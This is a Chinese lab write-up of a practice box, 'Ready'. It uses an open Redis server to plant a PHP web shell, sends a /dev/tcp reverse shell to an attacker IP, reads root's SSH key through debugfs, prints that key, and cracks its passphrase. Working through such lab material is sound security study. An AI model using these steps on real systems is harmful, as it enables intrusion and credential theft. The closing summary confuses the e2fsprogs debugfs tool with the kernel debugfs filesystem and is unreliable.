# 靶场搭建
下载:Ready
Nat,IP: 192.168.1.146
# 渗透过程
# 信息初收集
PORT STATE SERVICE VERSION | |
22/tcp open ssh OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0) | |
| ssh-hostkey: | |
| 3072 51:f9:f5:59:cd:45:4e:d1:2c:06:41:3b:a6:7a:91:19 (RSA) | |
| 256 5c:9f:60:b7:c5:50:fc:01:fa:37:7c:dc:16:54:87:3b (ECDSA) | |
|_ 256 04:da:68:25:69:d6:2a:25:e2:5b:e2:99:36:36:d7:48 (ED25519) | |
80/tcp open http Apache httpd 2.4.54 ((Debian)) | |
|_http-title: Apache2 Test Debian Default Page: It works | |
|_http-server-header: Apache/2.4.54 (Debian) | |
6379/tcp open redis Redis key-value store 6.0.16 | |
8080/tcp open http Apache httpd 2.4.54 ((Debian)) | |
|_http-open-proxy: Proxy might be redirecting requests | |
|_http-title: Apache2 Test Debian Default Page: It works | |
|_http-server-header: Apache/2.4.54 (Debian) |
┌──(root㉿kali)-[~] | |
└─# redis-cli -h 192.168.1.146 | |
192.168.1.146:6379> config set dir /var/www/html | |
OK | |
192.168.1.146:6379> config set dbfilename shell.php | |
OK | |
192.168.1.146:6379> set shell "<?php system($_GET['c']); ?>" | |
OK | |
192.168.1.146:6379> save | |
OK |
反弹 shell: http://192.168.1.146:8080/shell.php?c=bash+-c+%22bash+-i+%3e%26+%2fdev%2ftcp%2f192.168.1.129%2f4444+0%3e%261%22
拿到了 shell
# 提权
通过 debugfs 挂载磁盘,能直接读取到
ben@ready:/tmp$ df -h | |
Filesystem Size Used Avail Use% Mounted on | |
/dev/sda1 6.9G 1.5G 5.1G 23% / | |
udev 473M 0 473M 0% /dev | |
tmpfs 489M 0 489M 0% /dev/shm | |
tmpfs 98M 588K 98M 1% /run | |
tmpfs 5.0M 0 5.0M 0% /run/lock | |
ben@ready:/tmp$ which debugfs | |
/usr/sbin/debugfs | |
ben@ready:/tmp$ /usr/sbin/debugfs /dev/sda1 | |
debugfs 1.46.2 (28-Feb-2021) | |
debugfs: cat /root/.ssh/id_rsa | |
-----BEGIN RSA PRIVATE KEY----- | |
Proc-Type: 4,ENCRYPTED | |
DEK-Info: DES-EDE3-CBC,02E266E7A66462FE | |
tTN5G66QaZHsjOSYG8pFEQqUJUC4lw+WzHs3hbml1+zuLPmnDvUapYFB/4IgQNG2 | |
jp1tebAwENVz/CdS3paB60NB9uosYXHa60Sbi7a31Ej6QqH10UnN/NROSEhqZkt+ | |
dUcQspoDJIvHyvdhm4lIVizfvw1i9epxY+aB9W7vscpN1HAq37WdOn62nnEccLRs | |
wShZgOeOLTUo5j+C0oQZDi11ZJxEFiwwCFkOqZ+ZEQgshQqgG8PjMvedwuQcFjpN | |
wgFyQl0ZzGTzaj1iZntc/7G1/9WqXyk3IkpICucALCaSlCZ3Oh0kJd12W27vTKdO | |
kBpXNU8cgjc+jbIKveFZe6+ZuMwr3Lb9p+f+m7ktcTk/AFxSObuFnHBZN52VE/F4 | |
lVK8vR7Om8qg34REgbvkmrBttg7x4AzUsTZ1WPPJqu3VS0SGVyq8vkpA2ngHmMBC | |
h3Ca0Xjua55GzCFBGePrQmqOd8jKZ0W6HBfCQyGB/dGg57mKNQy1OSIR4XtFYDYN | |
wNGTgr4KPebWf1CYRg2nleu3DD3sezutvoVMLJdzoeaLrCPX0pdfEhBase7n72Gy | |
Q6zqrk07p5GQeuL3tfhBsbHqgK899IMPr2VZPwvaoibDF66UJ1unfEXiPzTTHDo9 | |
5MTR1GK7HYnmtypx3OpCDJMFGwaJgx+o944cxX9DQ63pgwx1R34RoQRfIgqUUrsG | |
NhEkLvrYFMnlK/dSmouuNFvd868zBlMByQyVYoepyHGhsGDuAP4Mhx7L1Gbj4dRS | |
dMgfgLN0lM0G+P9QvmmX7TuH1MU1IIfZZw9dCfdUqVVKyegA2RQ7fZG9D8o3l1J0 | |
bIj0VJE7ykqqZEndzgBGRw3bEu3/OKpJM2UFqr/pPlu1w1bVIzHrTPNI5nk6dm77 | |
n/TqwSgU2EQDWK88Z8TORZvuoNA3FelyzxCfRC2HLv0+QrVbyY7dLf3oLH0Zq+gK | |
1OYVrTKbe4pu0J2R7jZw20pLWeEZPuSE3RmVwcSsVzwb6dBk5rMkwCE5gG1qNh1U | |
koCqtHzXveisx5I7KrvBj5RTaK/aPX/v8BS/oh8AmiQr2Pqq9K+aQScP2XYh691x | |
yfVoFGJrZMcG5VD3QxrgWamgcHhug2LotpRbxjc777uK/muI9rUSQLYC06H2Cdf/ | |
kRUH9Ohf3ZrVXpcCMhuCBbOxYBr+TAGjwJIBAYuFMBqhZ4gyaZhxJMCBhQOJHy6c | |
xR2cUdOAUh9lY40/o0Pwf+5GWiX2u5KmzcZ9iLdJ4NtgYiYMjGMe+0G37PdCXJvG | |
D+VsowoqCou916TMZUKpYSkzj8q3GLSib6CumVzKDesMLaYiZTOd1ShBqTlYjorp | |
Dlo5vrgUFk17OS8n0gtQuavBvN+2aM6gMOgiJrXfeLjzPGoY2ypHyNlbp/JI0/Y+ | |
DfE+2kNqriAlvZps1mllIKITk1wNPQ3PVuBW9DkvrSUW7Ye+oMK3WoiQkY4qyu+2 | |
pN0okmXmT5ygTq9KBQUEtjU8RnY27y34nYwCQus0HCA+FfRoxDbJYl0sN2g/Mzjq | |
PWVlSZLxzcya8sxPBA8gto3H5BxFnTxRXbCBTjTL09imi3QMl9K1emUlG8rSpBsI | |
-----END RSA PRIVATE KEY----- |
┌──(root㉿kali)-[~/Downloads] | |
└─# ssh2john id > id_rsa.hash | |
┌──(root㉿kali)-[~/Downloads] | |
└─# john id_rsa.hash --wordlist=/usr/share/wordlists/rockyou.txt | |
Using default input encoding: UTF-8 | |
Loaded 1 password hash (SSH, SSH private key [RSA/DSA/EC/OPENSSH 32/64]) | |
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 1 for all loaded hashes | |
Cost 2 (iteration count) is 2 for all loaded hashes | |
Will run 4 OpenMP threads | |
Press 'q' or Ctrl-C to abort, almost any other key for status | |
shelly (id) | |
1g 0:00:00:00 DONE (2024-05-23 09:02) 50.00g/s 49600p/s 49600c/s 49600C/s marie1..babyface | |
Use the "--show" option to display all of the cracked passwords reliably | |
Session completed. |
拿到密钥密码: shelly
ssh 连上去,拿到 root
# 小结
debugfs 是一个用于调试文件系统的用户空间工具。它允许系统管理员和开发人员在内核中创建、删除和管理调试信息文件。debugfs 通常用于调试文件系统驱动程序和其他内核模块,以便可以在运行时动态地查看和修改文件系统的内部状态和结构。这对于诊断文件系统问题和了解文件系统的运行方式非常有用。debugfs 可以通过挂载 debugfs 文件系统来使用,通常在 /sys/kernel/debug/ 路径下。